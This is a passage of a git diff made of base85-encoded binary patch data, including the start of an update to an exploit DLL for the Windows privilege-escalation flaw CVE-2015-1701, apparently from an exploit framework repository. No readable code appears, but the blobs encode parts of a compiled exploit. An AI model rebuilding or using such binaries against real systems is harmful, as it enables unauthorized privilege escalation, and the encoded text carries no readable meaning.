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
aniE}yy3Rf8eb%<S=AbV}*DVjH1pXi99V(&#

diff --git a/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll b/data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
index db6ef0271219892dc2589f97256f745997d470d3..2dd92ae5f5b1745e9b24f20a7b13ba0d347a5716 100755
GIT binary patch
delta 10801
zcmc)Qe_Ryh-th666?7HERe=yuurN{aIQx6{Hx~ZrNQ#O0yU@@!r8I*gvz7u*8d%g=
zT89b`XxeQ@YQ2-nYE@D!GAb)7J8{f9lx9?Rq9XVCT+8ts&hxsT=YGBJe{NoV_kDf8
z*X-=fHFM3(u9fYJD%%%T(=}#N`r3KYKmIx--Iy3TR+9Em*w|bASQ{!&p5&h^OFBuC
zCCL!^?_c(&iY!Y@ctbV1wTI-C=qw6@wR?1z$|3DJ*)HFveI<{RAJvBHX3I;0%XIsr
z<tS~0J~bg~jBHpM?wD6~c6(2nY^V&Cr1)#JQhi##?a~-+t$wr)YV=)!zjuxdhr?Cf
z3oFAzDxT-V<~r;{Dz?z@N3mg>E6@KH4(EmwEFsBI)lzw^c*Bv3!J@Wg$o}c0%R_1X
zj^=Kz{E<SxgSnkg_LHQl>9GqJ&d=X8wI`gA#JhNNJgkz<;oh~)r;;I7*IxNaLGhIF
zOM9xUdUAiqLCG*T{6W8|J^pUdtnX&i!yi<2^(*O_8%~H~naXgnVg4%V-`2eNx~e1B
zR(-Mbus{BgWC$l@iseEj{mh}m{xogYpe2E-d9mhW<)^yy9aqQSHoU4tUlsL0c}KVF
zP;tx@*VXasy3C<#mmaQ~YS<L@fH{<P=6l9%&YbcUJ<{f>J>@I9B{tbw{W~@$p@U7T
z>aGlzIyX=4&RrGNr;?E$E@7V|8(q>})z#bdOS(%XDOdD$u4Aann+?}i9lcI$Z@H(7
zwMivIIyY<4F^cZx3z|J<uDnRAib+i#&yX&x2o*=Ix^U);a6%e8RWCN7Gf!)dvFher
zqWu~(N4{CRI@Yd#;n#5ZjMbm1RmU!!py$wYoOGLHc4g_ISgC5NK3rm`7xhlhg>bm_
z;$LvkU|E(GEjDhNY|!S$nJ2`u%vT*8{LbBjCF#sDhH=GqQLGHzeeaBV(GsIl?#a>`
z<GSQrZTpb;k)k@J;xzAy^j(mPqsuSoN~~3bRjqA^E8{?qIKejEb-Mh5T#`{4E=ix8
z8!pjzHc+2CU$j1CU$?88*)T~~gUbwOWO=Q2^{{}P6?|*hEwW+T1<BC4X(*>wiT>!c
zC0W|6`2F&3t$#wrunvy6I30>2$GrFwf45ef;FB}8lL?~|Gug1Y`JI0p$UChWB<4>x
zjmp%9B#w+^`JJoj30u?Y*)&S@cP@$)(nNDM&GO^nO`}A2d2{ThQEA$BiMu^DzcE{j
zNBD)E_l=RHg_WV=LF`31L6jDDHeANs$>aR>XYtbc7UQyzWlFB}4>W00FZq?JJ0&SG
zIf>QELn@BZeKa~tB((0IYWR~|yCvzkoTO!quqNeDuM7=&<Y3jo!{uW|CLLZ?=<f(_
z9^vfAk!wl0zQ5So`jnt?)RQttv2C<%u-FwoGF<#dmDQjPPrcG?ppxI|6NhN5XiMee
zBy;F!^a5Y+=Pq1)-L;3qkx}U!5m_oj+mw2_oD*zJ_2~lo!(v{A7~|fVTGj1Or!+tO
zfjPP@MK<^qk=2L1V!HmLq((~3eM{MqQcK@bZlu)Ow^S4<we=|l{2L;*6Mbs_nn<a=
zZ)sPgbh2+L6e)G|EuDyzPWLUHkCZz5mSUU59-WPp0{_^h^hm9%?_z4CbiPlizMI6K
zBkKPg3x8y(o<2+YH%3Yl<Nwd48X~2rzNO|!DWLCLYmd}o`<Bi}N`}5A{p(`;llqpD
